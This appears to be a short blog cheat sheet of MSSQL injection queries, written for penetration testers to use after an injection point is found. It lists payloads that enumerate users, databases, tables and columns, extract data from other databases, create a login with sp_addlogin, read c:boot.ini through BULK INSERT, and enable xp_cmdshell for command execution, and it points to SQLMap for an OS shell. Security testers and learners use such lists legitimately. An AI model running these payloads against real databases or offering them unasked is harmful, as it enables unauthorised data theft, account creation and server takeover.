After finding the injection point and detecting the exact number of column we can use the following basic queries to show proof of concept for the vulnerability.
| Function | Query | Remarks |
| Database version | SELECT @@version | |
| Host name | SELECT host_name() | |
| Current Database | SELECT DB_NAME() | |
| Current user | SELECT system_user; SELECT user; SELECT user_name() | |
| List Users | SELECT name from master..syslogins | |
| List Databases | SELECT name FROM master..sysdatabases; SELECT DB_NAME(*) | * = 1,2,3…. |
| Get Tables from current database | Select table_name FROM information_schema.tables; | |
| Get Tables from other database | SELECT name FROM other_database..sysobjects WHERE xtype = ‘U’– | |
| Get column from current DB’s | SELECT column_name FROM information_schema.columns WHERE table_name = ‘your_table_name’; | |
| Get column from other DB’s table | SELECT other_database..syscolumns.name,TYPE_NAME(other_database..syscolumns.xtype) FROM other_database..syscolumns, other_database..sysobjects WHEREother_database..syscolumns.id=other_database..sysobjects.id AND other_database..sysobjects.name=’other_table’ | |
| Extract Data | SELECT column_name FROM table_name | |
| Extract Data From another database | SELECT other_column_name FROM other_database..other_table | |
| Create User | EXEC sp_addlogin ‘user’, ‘pass’; | Privilege |
| Location of Database files | EXEC sp_helpdb master; EXEC sp_helpdb pubs; | |
| Local File Access | BULK INSERT mydata FROM ‘c:boot.ini’; | |
| Command Execution | EXEC sp_configure ‘xp_cmdshell’, 1; | Privilege |
If you want to do further exploitation like extracting data from the database or running OS shell you can use SQLMap tool.
Also Read: SQL Injection Explained From Scratch
[…] Also Read: MSSQL Injection Cheat sheet […]
[…] Also Read: MSSQL Injection Cheat sheet […]